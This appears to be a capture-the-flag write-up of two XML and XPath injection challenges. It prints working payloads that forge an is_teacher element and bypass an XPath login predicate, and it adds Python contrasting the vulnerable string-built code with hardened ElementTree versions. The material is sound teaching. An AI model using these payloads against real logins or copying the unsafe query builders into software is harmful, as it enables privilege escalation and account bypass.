XML Injection
Teacher Login 6
The challenge page ("XML Injection Login") greets you with "Welcome! Can you log in as teacher?" and displays the current database (users.xml):
<users></users>
Below it are an "Add a User" form and a "Login" form, each with a single Username field.
The input fields are of text type
After adding a couple of users, the db looks like:
<users><user><username>user</username><is_teacher>no</is_teacher></user><user><username>user2</username><is_teacher>no</is_teacher></user></users>
Injecting <is_teacher>yes</is_teacher> using the payload:
user3</username><is_teacher>yes</is_teacher></user><user><username>user4
The result db:
<users><user><username>user</username><is_teacher>no</is_teacher></user><user><username>user2</username><is_teacher>no</is_teacher></user><user><username>user3</username><is_teacher>yes</is_teacher></user><user><username>user4</username><is_teacher>no</is_teacher></user></users>
Logging in as "user3" gives the flag.
Teacher Login 7
The previous solution no longer works because the input is now escaped before it is stored: < and > are converted into &lt; and &gt;, so the payload ends up as plain text inside <username> instead of new elements.
In the server code, we observe that XPath is used for the login lookup:
query = f"//user[username/text()='{username}' and is_teacher/text()='yes']"
XPath injection using the following username:
user' or 1=1 or 'a'='a
This results in the following xpath query:
//user[username/text()='user' or 1=1 or 'a'='a' and is_teacher/text()='yes']
username = 'user' or 1=1 or 'a'='a' and is_teacher='yes'
Since "and" binds tighter than "or", this groups as:
(username = 'user' or 1=1) or ('a'='a' and is_teacher='yes')
For a non-teacher account whose name is not "user", that evaluates to:
(false or true) or (true and false)
true or false
true
The predicate is true for every <user> node, so the first one matches and logging in with this username gives the flag.
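The following Python is an added example, not the challenge's server code. It reproduces both weaknesses above (string-built XML in Teacher Login 6, a string-built XPath predicate in Teacher Login 7) next to a hardened version that builds the document through the XML API and compares the username in code instead of splicing it into a query. The database format and the two payloads are taken from this page; the function names are my own.

```python
import xml.etree.ElementTree as ET

EMPTY_DB = "<users></users>"
# Payloads exactly as used on this page (constructed inputs for the demo).
PAYLOAD_XML = "user3</username><is_teacher>yes</is_teacher></user><user><username>user4"
PAYLOAD_XPATH = "user' or 1=1 or 'a'='a"


def add_user_unsafe(db: str, username: str) -> str:
    """Teacher Login 6 style: the name is pasted into markup, so closing tags
    in the name create a sibling <is_teacher>yes</is_teacher> element."""
    entry = f"<user><username>{username}</username><is_teacher>no</is_teacher></user>"
    return db.replace("</users>", entry + "</users>")


def add_user_safe(db: str, username: str) -> str:
    """Build the node through the XML API: ElementTree serialises '<' and '>'
    in text as &lt; and &gt;, the escaping that Teacher Login 7 added."""
    root = ET.fromstring(db)
    user = ET.SubElement(root, "user")
    ET.SubElement(user, "username").text = username
    ET.SubElement(user, "is_teacher").text = "no"
    return ET.tostring(root, encoding="unicode")


def build_query_unsafe(username: str) -> str:
    """The challenge's query construction: the value lands inside the
    predicate unquoted, so a single quote ends the string literal."""
    return f"//user[username/text()='{username}' and is_teacher/text()='yes']"


def is_teacher_safe(db: str, username: str) -> bool:
    """Hardened check: no query text is built from user data. The stored
    username is compared as a whole string, so quotes and 'or 1=1' are
    just characters that fail to match."""
    root = ET.fromstring(db)
    for user in root.findall("user"):
        if user.findtext("username") == username:
            return user.findtext("is_teacher") == "yes"
    return False


def users_with_flags(db: str) -> list:
    """Return (username, is_teacher) pairs so the stored state can be inspected."""
    root = ET.fromstring(db)
    return [(u.findtext("username"), u.findtext("is_teacher")) for u in root.findall("user")]
```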